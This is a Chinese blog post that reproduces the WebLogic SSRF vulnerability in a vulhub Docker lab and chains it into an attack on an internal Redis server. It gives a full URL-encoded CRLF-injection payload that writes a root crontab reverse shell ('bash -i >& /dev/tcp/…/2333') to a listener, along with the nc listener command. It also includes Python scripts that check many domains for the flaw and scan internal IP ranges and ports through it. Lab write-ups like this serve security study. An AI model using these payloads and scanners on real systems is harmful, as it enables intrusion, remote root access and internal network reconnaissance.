• SSRF——weblogic vulhub 漏洞复现及攻击内网redis(一)(附批量检测脚本)


    0X01 概述

    SSRF(Server-Side Request Forgery, 服务端请求伪造)利用漏洞可以发起网络请求来攻击内网服务。
    利用SSRF能实现以下效果:
    1)        扫描内网(主机信息收集,Web应用指纹识别)
    2)        根据所识别应用发送构造的Payload进行攻击
    3)        Denial of service(请求大文件,始终保持连接Keep-Alive Always)

    0X02 vulhub weblogic SSRF 漏洞复现

    环境搭建

    下载vulhub:git clone https://github.com/vulhub/vulhub.git

    启动环境:docker-compose up -d

    访问:http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp

    出现以下页面,说明测试环境ok。

    漏洞复现

    访问以下页面,确认是否存在SSRF漏洞。

    http://192.168.220.142:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://192.168.220.144

    其中,最后的operator参数为内网ip,若存在此报错: weblogic.uddi.client.structures.exception.XML_SoapException,说明存在SSRF漏洞。

    漏洞利用

    【利用1】  探测内网存活ip

     

    【利用2】  探测端口

    【利用3】  攻击redis(通过header CRLF 注入

    Weblogic的SSRF有一个比较大的特点,其虽然是一个“GET”请求,但是我们可以通过传入`%0a%0d`来注入换行符,而某些服务(如redis)是通过换行符来分隔每条命令,也就说我们可以通过该SSRF攻击内网中的redis服务器。
     

    ①查看docker redis的ip地址

    docker ps
    docker exec -it 7b12841eedbf ip addr
    172.22.0.2是docker redis的内网地址

    ②利用SSRF漏洞探测内网redis是否开放

     

    ③准备好攻击代码

     
    test
    
    set 1 "
    
    
    
    * * * * * root bash -i >& /dev/tcp/192.168.220.140/2333 0>&1
    
    
    
    "
    config set dir /etc/
    config set dbfilename crontab
    save
    
    aaa

     将上述攻击代码转换成URL编码:

    test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.220.140%2F2333%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
     

    ④实施攻击

    kali监听端口:nc -lvvp 2333 
    浏览器访问:
    http://192.168.220.142:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.22.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.220.140%2F2333%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
    反弹shell成功!
     

    具体过程如下:

    0X03 批量检测脚本

    批量检测weblogic_SSRF漏洞 

    将域名保存在domain.txt文件中,运行脚本,自动进行批量检测。

     

    代码如下:

    #!/usr/bin/env python  
    # -*- coding: utf-8 -*-
    # 功能:批量探测weblogic SSRF漏洞
    import re import sys import Queue import requests import threading from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) queue = Queue.Queue() mutex = threading.Lock() class Weblogic_SSRF_Check(threading.Thread): """docstring for Weblogic_SSRF_Check""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def check(self,domain,ip): payload = "uddiexplorer/SearchPublicRegistries.jsp?operator={ip}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search".format(ip=ip) url = domain + payload try: html = requests.get(url=url, timeout=15, verify=False).content m = re.search('weblogic.uddi.client.structures.exception.XML_SoapException',html) if m: mutex.acquire() with open('ssrf.txt','a+') as f: print "%s has weblogic ssrf." % domain f.write("%s has weblogic ssrf. " % domain) mutex.release() except Exception,e: pass def get_registry(self,domain): payload = 'uddiexplorer/SetupUDDIExplorer.jsp' url = domain + payload try: html = requests.get(url=url, timeout=15, verify=False).content m = re.search('<i>For example: (.*?)/uddi/uddilistener.*?</i>',html) if m: return m.group(1) except Exception,e: pass def run(self): while not self.queue.empty(): domain = self.queue.get() mutex.acquire() print domain mutex.release() ip = self.get_registry(domain) self.check(domain,ip) self.queue.task_done() if __name__ == '__main__': with open('C:\Users\m\domain.txt','r') as f: lines = f.readlines() for line in lines: queue.put(line.strip()) for x in xrange(1,50): t = Weblogic_SSRF_Check(queue) t.setDaemon(True) t.start() queue.join()

    通过weblogic_SSRF漏洞探测内网ip及端口

    --url参数:存在weblogic SSRF漏洞的url
    --ip参数:想扫描的内网网段
     

     代码如下:

    #!/usr/bin/env python
    # coding: utf-8
    # 功能:扫描内网开放ip及端口
    
    import argparse
    import thread
    import time
    import re
    import requests
    
    
    
    def ite_ip(ip):
        #for i in range(1, 256):
        for i in range(139, 146):
            final_ip = '{ip}.{i}'.format(ip=ip, i=i)
            thread.start_new_thread(scan, (final_ip,))
            time.sleep(3)
    
    def scan(final_ip):
        #ports = ('21', '22', '23', '53', '80', '135', '139', '443', '445', '1080', '1433', '1521', '3306', '3389', '4899', '8080', '7001', '8000')
        ports = ( '80', '445','22','6379')
        for port in ports:
            vul_url = args.url + '/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search' % (final_ip, port)
            try:
                r = requests.get(vul_url, timeout=15, verify=False) 
                result0 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException', r.content)
                result1 = re.findall('route to host', r.content)
                result2 = re.findall('but could not connect', r.content)
                if len(result0) != 0 and len(result1) == 0 and len(result2) == 0:
                    out = "port exist: " + final_ip + ':' + port
                    print out        
            except Exception, e:
                pass
    
    def get_ip():
        vul_url = args.url + '/uddiexplorer/SetupUDDIExplorer.jsp'
        r = requests.get(vul_url, timeout=15, verify=False)
        reg = re.compile(r"For example: http://(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?) b")
        result1 = reg.findall(r.content)
        result = ""
        if result1:
            result = result1[0].replace("For example: http://","")
        return result
    
    if __name__ == '__main__':
        parser = argparse.ArgumentParser(description='Weblogic SSRF vulnerable exploit') 
        parser.add_argument('--url', dest='url', required=True, help='Target url')
        parser.add_argument('--ip', dest='scan_ip', help='IP to scan')
        args = parser.parse_args()
        ip = '.'.join(args.scan_ip.split('.')[:-1])
        #print ip
        #ip = get_ip()
        if ip:
            ite_ip(ip)
        else:
            print "no ip"
  • 相关阅读:
    使用 PowerShell 进行 SQL Server 数据库备份
    当 Windows 10 应用商店更新游戏/应用遇到 0x80070032 错误时的一种解决方案
    在 SQL Server 恢复一个已存在的数据库的备份(即通过备份功能复制一个新数据库)
    在 Windows Server 2008 R2 中安装 PowerShell 5.1 与中文脚本错误解决
    vite项目使用 vitepluginmock 插件 mock数据,fetch报错SyntaxError: Unexpected token < in JSON at position 0
    MAC和移动端实现charles和代理软件共存【100%生效】
    eslint遇到的报错
    swiper.js轮播在iOS下禁用上拉下拉回弹问题解决
    js图片监听onload事件,依然有获取不到宽高的场景
    15分钟快速配置eslint,prettier,lintstaged,husky,commitizen实现前端项目代码规范化
  • 原文地址:https://www.cnblogs.com/flokz/p/weblogic_SSRF.html
Copyright © 2020-2023  润新知